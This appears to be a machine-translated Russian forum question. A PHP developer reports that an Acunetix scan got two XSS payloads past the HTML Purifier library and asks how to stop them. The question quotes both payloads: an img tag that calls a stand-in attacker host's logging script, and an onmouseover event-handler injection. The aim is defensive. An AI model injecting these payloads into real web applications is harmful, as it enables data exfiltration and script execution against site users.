в этом вопросе / ответе
тирую одно из моих веб-приложений, используяAcunetix, Чтобы защитить этот проект от атак XSS, я использовалОчиститель HTML, Эта библиотека рекомендована большинством разработчиков PHP для этой цели, но мои результаты сканирования показывают, что HTML Purifier не может полностью защитить нас от XSS-атак. Сканер обнаружил два способа атаки, посылая различные вредоносные данные:
1<img sRc='http://attacker-9437/log.php?
(См. Результат «Очиститель HTML»Вот)1"onmouseover=vVF3(9185)"
(См. Результат «Очиститель HTML»Вот)Как вы видите результаты, HTML Purifier не смог обнаружить такие атаки. Я не знаю, есть ли какая-то конкретная опция в HTML Purifier для решения таких проблем, или она действительно не может обнаружить эти методы XSS-атак.
Есть ли у вас какие-либо идеи? Или любое другое решение?